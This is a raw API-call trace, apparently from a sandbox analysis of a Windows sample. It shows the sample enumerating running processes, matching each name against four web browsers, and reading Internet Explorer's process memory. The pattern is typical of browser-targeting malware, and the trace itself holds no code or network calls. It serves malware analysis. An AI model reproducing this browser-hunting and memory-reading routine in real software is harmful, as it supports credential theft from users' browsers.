	[0206.612] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.612] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0206.612] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.612] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.612] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0206.613] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x2fdc
	[0206.613] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.613] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0206.613] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.613] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.614] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.614] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0206.614] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.614] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.614] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0206.615] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x2fe0
	[0206.615] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.615] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0206.615] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.616] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.616] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.616] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0206.616] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.616] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.616] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0206.617] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x2fe4
	[0206.617] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.617] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0206.618] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.618] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.618] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.618] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0206.618] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.618] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.618] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0206.619] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x2fe8
	[0206.619] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.619] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0206.620] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.620] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.620] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.620] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0206.620] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.620] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.620] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0206.621] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0206.621] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0206.622] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x2fec
	[0206.622] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.622] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0206.632] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.632] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.632] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.632] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0206.633] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.633] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.633] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0206.634] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x2ff0
	[0206.634] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.634] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0206.634] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.634] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.635] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.635] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0206.635] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.635] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.635] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0206.636] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x2ff4
	[0206.636] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.636] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0206.636] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.636] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.637] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.637] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0206.637] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.637] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.637] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0206.638] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x2ff8
	[0206.638] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.638] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0206.638] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.638] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.639] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.639] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0206.639] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.639] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.639] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0206.640] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x2ffc
	[0206.640] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.640] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0206.641] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.641] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.641] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.641] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0206.642] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.642] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.642] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0206.643] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x3004
	[0206.643] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.643] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0206.643] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.643] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.643] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.643] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0206.644] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.644] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.644] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0206.645] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x3008
	[0206.645] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.645] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0206.645] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.645] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.646] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.646] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0206.646] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.646] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.647] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0206.647] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x300c
	[0206.647] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.647] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0206.648] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.648] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.648] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.648] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0206.649] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.649] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.649] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0206.650] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x3010
	[0206.650] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.650] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0206.650] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.650] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.650] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.650] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0206.651] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.651] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.651] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0206.651] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x3014
	[0206.652] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.652] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0206.652] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.652] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.652] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.652] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0206.652] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.652] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.653] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0206.653] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x3018
	[0206.653] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.653] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0206.654] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.654] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.654] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.654] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0206.655] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.655] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.655] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0206.656] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x301c
	[0206.656] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.656] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0206.657] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.657] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.657] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.657] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0206.658] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.658] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.658] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0206.659] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x3020
	[0206.659] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.659] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0206.659] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.659] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.660] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.660] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0206.660] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.660] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.661] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0206.661] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x3024
	[0206.661] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.661] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0206.662] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.662] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.663] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.663] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0206.663] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.663] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.664] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0206.664] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x3028
	[0206.665] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.665] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0206.665] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.665] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.666] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.666] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0206.666] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.666] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.666] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0206.667] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x302c
	[0206.667] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.667] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0206.667] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.667] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0206.668] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.668] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0206.668] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.668] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.668] NtQueryInformationProcess (in: ProcessHandle=0x302c, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0206.668] ReadProcessMemory (in: hProcess=0x302c, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0206.668] ReadProcessMemory (in: hProcess=0x302c, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0206.668] ReadProcessMemory (in: hProcess=0x302c, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0206.669] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0206.669] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0206.669] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x3030
	[0206.670] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.670] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0206.670] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.670] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0206.670] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.670] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0206.670] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.670] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.671] NtQueryInformationProcess (in: ProcessHandle=0x3030, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0206.671] ReadProcessMemory (in: hProcess=0x3030, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0206.671] ReadProcessMemory (in: hProcess=0x3030, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0206.671] ReadProcessMemory (in: hProcess=0x3030, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0206.671] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0206.671] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0206.672] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x3034
	[0206.672] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.672] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0206.673] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.673] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.673] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.673] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0206.673] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.673] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
